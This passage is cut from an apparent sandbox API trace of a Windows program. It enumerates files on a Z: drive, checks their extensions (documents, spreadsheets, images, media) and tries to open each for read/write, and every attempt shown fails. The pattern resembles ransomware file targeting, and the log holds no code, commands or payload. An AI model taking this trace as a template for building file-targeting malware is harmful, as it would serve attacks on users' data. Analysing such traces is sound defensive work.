ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xef2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UWPd5V722.jpg", cAlternateFileName="")) returned 1 [0177.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.437] PathFindExtensionW (pszPath="Z:\\UWPd5V722.jpg") returned=".jpg" [0177.441] CreateFileW (lpFileName="Z:\\UWPd5V722.jpg" (normalized: "z:\\uwpd5v722.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.442] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x112a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3vXkT9bZW2wQG2nOsz.flv", cAlternateFileName="")) returned 1 [0177.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.442] PathFindExtensionW (pszPath="Z:\\3vXkT9bZW2wQG2nOsz.flv") returned=".flv" [0177.446] CreateFileW (lpFileName="Z:\\3vXkT9bZW2wQG2nOsz.flv" (normalized: "z:\\3vxkt9bzw2wqg2nosz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.448] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x173b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rSvaTPcyuRZ.avi", cAlternateFileName="")) returned 1 [0177.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.448] PathFindExtensionW (pszPath="Z:\\rSvaTPcyuRZ.avi") returned=".avi" [0177.451] CreateFileW (lpFileName="Z:\\rSvaTPcyuRZ.avi" (normalized: "z:\\rsvatpcyurz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.453] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x52b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BEWCWMGvP7.odp", cAlternateFileName="")) returned 1 [0177.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.453] PathFindExtensionW (pszPath="Z:\\BEWCWMGvP7.odp") returned=".odp" [0177.459] CreateFileW (lpFileName="Z:\\BEWCWMGvP7.odp" (normalized: "z:\\bewcwmgvp7.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.461] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb7f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ERBbBrh6.mp3", cAlternateFileName="")) returned 1 [0177.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.461] PathFindExtensionW (pszPath="Z:\\ERBbBrh6.mp3") returned=".mp3" [0177.466] CreateFileW (lpFileName="Z:\\ERBbBrh6.mp3" (normalized: "z:\\erbbbrh6.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.468] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x968a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cYeVSPPEdjtBCAgcD.m4a", cAlternateFileName="")) returned 1 [0177.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.468] PathFindExtensionW (pszPath="Z:\\cYeVSPPEdjtBCAgcD.m4a") returned=".m4a" [0177.473] CreateFileW (lpFileName="Z:\\cYeVSPPEdjtBCAgcD.m4a" (normalized: "z:\\cyevsppedjtbcagcd.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.475] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf715, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="t0dVU7jjqdjfnF7OmqO.png", cAlternateFileName="")) returned 1 [0177.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.475] PathFindExtensionW (pszPath="Z:\\t0dVU7jjqdjfnF7OmqO.png") returned=".png" [0177.480] CreateFileW (lpFileName="Z:\\t0dVU7jjqdjfnF7OmqO.png" (normalized: "z:\\t0dvu7jjqdjfnf7omqo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.482] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc295, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wPgITKWMM0.rtf", cAlternateFileName="")) returned 1 [0177.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.482] PathFindExtensionW (pszPath="Z:\\wPgITKWMM0.rtf") returned=".rtf" [0177.488] CreateFileW (lpFileName="Z:\\wPgITKWMM0.rtf" (normalized: "z:\\wpgitkwmm0.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.489] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17dbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DTakzSmlzvmIUv.mp3", cAlternateFileName="")) returned 1 [0177.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.489] PathFindExtensionW (pszPath="Z:\\4DTakzSmlzvmIUv.mp3") returned=".mp3" [0177.495] CreateFileW (lpFileName="Z:\\4DTakzSmlzvmIUv.mp3" (normalized: "z:\\4dtakzsmlzvmiuv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.497] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x99c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aYwQj9EW4jZuUePCOt1y.jpg", cAlternateFileName="")) returned 1 [0177.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.497] PathFindExtensionW (pszPath="Z:\\aYwQj9EW4jZuUePCOt1y.jpg") returned=".jpg" [0177.502] CreateFileW (lpFileName="Z:\\aYwQj9EW4jZuUePCOt1y.jpg" (normalized: "z:\\aywqj9ew4jzuuepcot1y.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.504] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13e28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hzhCnO8TQqI.avi", cAlternateFileName="")) returned 1 [0177.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.504] PathFindExtensionW (pszPath="Z:\\hzhCnO8TQqI.avi") returned=".avi" [0177.510] CreateFileW (lpFileName="Z:\\hzhCnO8TQqI.avi" (normalized: "z:\\hzhcno8tqqi.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.511] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd6af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0fyyBWfRWm61u1MhJ.doc", cAlternateFileName="")) returned 1 [0177.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.511] PathFindExtensionW (pszPath="Z:\\0fyyBWfRWm61u1MhJ.doc") returned=".doc" [0177.517] CreateFileW (lpFileName="Z:\\0fyyBWfRWm61u1MhJ.doc" (normalized: "z:\\0fyybwfrwm61u1mhj.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.519] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd2f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hExQispuuoymhG1i192v.ppt", cAlternateFileName="")) returned 1 [0177.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.519] PathFindExtensionW (pszPath="Z:\\hExQispuuoymhG1i192v.ppt") returned=".ppt" [0177.524] CreateFileW (lpFileName="Z:\\hExQispuuoymhG1i192v.ppt" (normalized: "z:\\hexqispuuoymhg1i192v.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.526] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x100ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VQa7D2fVvyShxsM.xlsx", cAlternateFileName="")) returned 1 [0177.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.526] PathFindExtensionW (pszPath="Z:\\VQa7D2fVvyShxsM.xlsx") returned=".xlsx" [0177.531] CreateFileW (lpFileName="Z:\\VQa7D2fVvyShxsM.xlsx" (normalized: "z:\\vqa7d2fvvyshxsm.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcc9b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nVlM8WgmSnZtiC.avi", cAlternateFileName="")) returned 1 [0177.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.533] PathFindExtensionW (pszPath="Z:\\nVlM8WgmSnZtiC.avi") returned=".avi" [0177.538] CreateFileW (lpFileName="Z:\\nVlM8WgmSnZtiC.avi" (normalized: "z:\\nvlm8wgmsnztic.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.540] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12fc8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6614ZQjKlVVwMsRoTm.pdf", cAlternateFileName="")) returned 1 [0177.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.540] PathFindExtensionW (pszPath="Z:\\6614ZQjKlVVwMsRoTm.pdf") returned=".pdf" [0177.545] CreateFileW (lpFileName="Z:\\6614ZQjKlVVwMsRoTm.pdf" (normalized: "z:\\6614zqjklvvwmsrotm.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.547] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf521, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d9y1S5e4eLHUosqR.png", cAlternateFileName="")) returned 1 [0177.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.547] PathFindExtensionW (pszPath="Z:\\d9y1S5e4eLHUosqR.png") returned=".png" [0177.552] CreateFileW (lpFileName="Z:\\d9y1S5e4eLHUosqR.png" (normalized: "z:\\d9y1s5e4elhuosqr.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.554] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xee3f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sWz45.xls", cAlternateFileName="")) returned 1 [0177.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.554] PathFindExtensionW (pszPath="Z:\\sWz45.xls") returned=".xls" [0177.560] CreateFileW (lpFileName="Z:\\sWz45.xls" (normalized: "z:\\swz45.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.561] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9841, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ydAClD.jpg", cAlternateFileName="")) returned 1 [0177.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.561] PathFindExtensionW (pszPath="Z:\\ydAClD.jpg") returned=".jpg" [0177.567] CreateFileW (lpFileName="Z:\\ydAClD.jpg" (normalized: "z:\\ydacld.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.569] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbccc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NLSuxvhNNdJma1.ods", cAlternateFileName="")) returned 1 [0177.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.569] PathFindExtensionW (pszPath="Z:\\NLSuxvhNNdJma1.ods") returned=".ods" [0177.574] CreateFileW (lpFileName="Z:\\NLSuxvhNNdJma1.ods" (normalized: "z:\\nlsuxvhnndjma1.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.575] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x646c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z3wsaUYVG.ppt", cAlternateFileName="")) returned 1 [0177.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.575] PathFindExtensionW (pszPath="Z:\\z3wsaUYVG.ppt") returned=".ppt" [0177.580] CreateFileW (lpFileName="Z:\\z3wsaUYVG.ppt" (normalized: "z:\\z3wsauyvg.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.583] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd9ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vwYDXw6oVEHN2plf7.xls", cAlternateFileName="")) returned 1 [0177.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.583] PathFindExtensionW (pszPath="Z:\\vwYDXw6oVEHN2plf7.xls") returned=".xls" [0177.588] CreateFileW (lpFileName="Z:\\vwYDXw6oVEHN2plf7.xls" (normalized: "z:\\vwydxw6ovehn2plf7.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.589] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, 